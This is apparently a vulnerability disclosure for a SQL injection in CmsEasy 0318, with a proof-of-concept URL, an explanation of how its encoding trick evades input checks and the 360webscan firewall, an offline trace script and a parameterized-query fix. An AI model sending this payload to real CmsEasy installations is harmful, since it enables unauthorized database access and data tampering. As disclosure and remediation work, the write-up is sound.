SQL injection in the latest CmsEasy
Unfortunately this does not get past 360webscan (although in practice it is easy to bypass).
The latest CmsEasy release (version 0318) contains a SQL injection.
Vulnerable file: /lib/default/archive_act.php
Around line 250:
function search_action() {
    //print_r($_SESSION);exit();
    if (front::get('ule')) {
        front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);
        front::$get['keyword'] = urldecode(front::$get['keyword']);
    }
    if (front::get('keyword') && !front::post('keyword'))
        front::$post['keyword'] = front::get('keyword');
    front::check_type(front::post('keyword'), 'safe');
    if (front::post('keyword')) {
        $this->view->keyword = trim(front::post('keyword'));
        session::set('keyword', trim(front::post('keyword')));
        /*
        if (isset(front::$get['keyword']))
            front::redirect(preg_replace('/keyword=[^&]+/', 'keyword=' . urlencode($this->view->keyword), front::$uri));
        else
            front::redirect(front::$uri . '&keyword=' . urlencode($this->view->keyword));
        */
    } else {
        $this->view->keyword = session::get('keyword');
    }
    if (preg_match('/union/i', $this->view->keyword) || preg_match('/"/i', $this->view->keyword) || preg_match('/\'/i', $this->view->keyword)) {
        exit('invalid parameter');
    }
The important part:
if (front::get('ule')) {
    front::$get['keyword'] = str_replace('-', '%', front::$get['keyword']);
    front::$get['keyword'] = urldecode(front::$get['keyword']);
}
If the GET parameter ule is set, this branch is entered: every '-' in keyword is replaced by '%', and the result is then urldecoded.
As a result a single quote can be introduced directly: passing -27 turns into %27, which urldecodes to '. The check_type(..., 'safe') call and any WAF see only the harmless-looking -27.
Look further down:
session::set('keyword', trim(front::post('keyword')));
The session class it calls:
class session {
    static function get($key) {
        if (isset($_SESSION[$key]))
            return $_SESSION[$key];
        else
            return false;
    }
    static function set($key, $var) {
        $_SESSION[$key] = $var;
    }
    static function del($key) {
        unset($_SESSION[$key]);
    }
}
//session_start();
CmsEasy uses its own session handler, so once the value is in the session it is written to the database:
/lib/plugins/stsession.php
public function write($id, $data) {
    $sql = "SELECT * FROM {$this->_prefix}sessionox where PHPSESSID = '$id'";
    //var_dump($sql);
    $res  = $this->_db->query($sql);
    $time = time();
    $row  = $this->_db->fetch_array($res);
    if ($row) {
        //if ($row['data'] != $data) {
        $sql = "UPDATE {$this->_prefix}sessionox SET update_time='$time',data='$data' WHERE PHPSESSID = '$id'";
        $this->_db->query($sql);
        //}
    } else {
        if (!empty($data)) {
            $sql = "INSERT INTO {$this->_prefix}sessionox (PHPSESSID, update_time, client_ip, data) VALUES ('$id','$time','$this->_ip','$data')";
            $this->_db->query($sql);
        }
    }
    return true;
}
$data (the serialized $_SESSION contents, including our keyword) is interpolated directly into the UPDATE and INSERT statements, which is where the injection happens.
The preg_match check that follows in search_action() does not prevent this: session::set() has already stored the keyword, and PHP saves the session through the handler at request shutdown, so the database write happens even when exit('invalid parameter') is reached.
if (preg_match('/union/i', $this->view->keyword) || preg_match('/"/i', $this->view->keyword) || preg_match('/\'/i', $this->view->keyword)) {
    exit('invalid parameter');
}
The blocking whitelist has also been changed, so it cannot be used to bypass 360webscan:
/**
 * Blocking directory whitelist
 */
function webscan_white($webscan_white_name, $webscan_white_url = array()) {
    $url_path = $_SERVER['SCRIPT_NAME'];
    foreach ($_GET as $key => $value) {
        $url_var .= $key . "=" . $value . "&";
    }
    if (preg_match("/" . $webscan_white_name . "/is", $url_path) == 1 && !empty($webscan_white_name)) {
        return false;
    }
    foreach ($webscan_white_url as $key => $value) {
        if (!empty($url_var) && !empty($value)) {
            if (stristr($url_path, $key) && stristr($url_var, $value)) {
                return false;
            }
        } elseif (empty($url_var) && empty($value)) {
            if (stristr($url_path, $key)) {
                return false;
            }
        }
    }
    return true;
}
Verifying the injection:
http://127.0.0.1/cmseasy/index.php?case=archive&act=search&keyword=-27,client_ip=user()-23&ule=1
After the ule decoding the keyword is ',client_ip=user()# : the quote closes the data='...' literal in the UPDATE, client_ip=user() becomes a second SET assignment, and # comments out the rest of the statement.
An attacker can bypass 360webscan and perform blind injection directly.
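The following is an added example, not code from CmsEasy or from the original post. It traces the PoC request above through the same transformations that archive_act.php and stsession.php apply and prints the SQL the session handler would execute, so the quote breakout can be seen without a database. The table prefix, session id and timestamp are assumed values chosen for the trace.

```php
<?php
// Added example (not CmsEasy's own code): follow the PoC keyword through the
// 'ule' decoding, PHP session serialization and the vulnerable UPDATE string.
// Nothing is sent to a database; the statement is only printed.

// Constructed query string, equivalent to the PoC URL above.
parse_str('case=archive&act=search&keyword=-27,client_ip=user()-23&ule=1', $get);

// Step 1: the 'ule' branch in search_action(): '-' -> '%', then urldecode.
$keyword = $get['keyword'];
if (!empty($get['ule'])) {
    $keyword = str_replace('-', '%', $keyword);   // -27 -> %27, -23 -> %23
    $keyword = urldecode($keyword);               // %27 -> ', %23 -> #
}
$keyword = trim($keyword);
echo "keyword after decoding: $keyword\n";        // ',client_ip=user()#

// Step 2: session::set('keyword', ...) puts it in $_SESSION. At shutdown PHP
// hands the handler the serialized session in the form key|serialize(value).
// (Assumption: session.serialize_handler = php, the default.)
$data = 'keyword|' . serialize($keyword);
echo "session data: $data\n";                     // keyword|s:19:"',client_ip=user()#";

// Step 3: stsession.php's write() interpolates $data into the UPDATE.
$prefix = 'cmseasy_';      // assumed table prefix
$id     = 'demo_sess_id';  // assumed session id
$time   = 0;               // fixed instead of time() so the output is stable
$sql = "UPDATE {$prefix}sessionox SET update_time='$time',data='$data' WHERE PHPSESSID = '$id'";
echo "$sql\n";
// UPDATE cmseasy_sessionox SET update_time='0',data='keyword|s:19:"',client_ip=user()#";' WHERE PHPSESSID = 'demo_sess_id'
// The ' from %27 closes the data literal, ",client_ip=user()" becomes a second
// SET assignment, and # comments out the remainder, including the WHERE clause.

// Step 4: the check that runs after session::set() in search_action() does
// reject this keyword, but the session has already been populated, so the
// write above still happens at shutdown.
$blocked = preg_match('/union/i', $keyword) || preg_match('/"/i', $keyword) || preg_match("/'/i", $keyword);
echo $blocked ? "preg_match check: rejected (too late)\n" : "preg_match check: passed\n";
```

Run it with `php trace.php`; the printed UPDATE is the statement that write() would send for this request.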
Fix:
Filter the input. In particular, $data and $id must not be interpolated into the SQL string in stsession.php; escape them or bind them as parameters before the query is built.
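One way to apply that fix, as an added example rather than a CmsEasy patch: a rewritten write() that binds $id, $time, the client IP and $data as prepared-statement parameters, so a quote in the session data cannot alter the statement no matter how it got there. It assumes a mysqli connection is available instead of CmsEasy's $this->_db wrapper, and that the table layout is the one shown above; the class and property names are illustrative.

```php
<?php
// Added example (not CmsEasy's own code): hardened session store write().
// Assumes a mysqli connection in $this->_mysqli; the table and columns are
// the ones used by stsession.php above.
class SafeSessionStore {
    private $_mysqli;
    private $_prefix;
    private $_ip;

    public function __construct(mysqli $mysqli, $prefix, $ip) {
        $this->_mysqli = $mysqli;
        $this->_prefix = $prefix;   // trusted configuration, never user input
        $this->_ip     = $ip;
    }

    public function write($id, $data) {
        $table = $this->_prefix . 'sessionox';
        $time  = time();

        // Existence check with a bound parameter instead of '$id' in the string.
        $stmt = $this->_mysqli->prepare("SELECT 1 FROM {$table} WHERE PHPSESSID = ?");
        $stmt->bind_param('s', $id);
        $stmt->execute();
        $stmt->store_result();
        $exists = $stmt->num_rows > 0;
        $stmt->close();

        if ($exists) {
            // The serialized session goes in as a value; a quote inside it
            // stays inside the string and cannot add a second SET clause.
            $stmt = $this->_mysqli->prepare(
                "UPDATE {$table} SET update_time = ?, data = ? WHERE PHPSESSID = ?");
            $stmt->bind_param('iss', $time, $data, $id);
        } elseif ($data !== '') {
            $stmt = $this->_mysqli->prepare(
                "INSERT INTO {$table} (PHPSESSID, update_time, client_ip, data) VALUES (?, ?, ?, ?)");
            $stmt->bind_param('siss', $id, $time, $this->_ip, $data);
        } else {
            return true;   // nothing to store for an empty session, as in the original
        }
        $ok = $stmt->execute();
        $stmt->close();
        return $ok;
    }
}
```

The same change should be made to the SELECT in the original write() and to the other handler methods that build SQL from $id; the keyword decoding in search_action() is the entry point, but the session table is written from every request, so the handler is the place the escaping has to live.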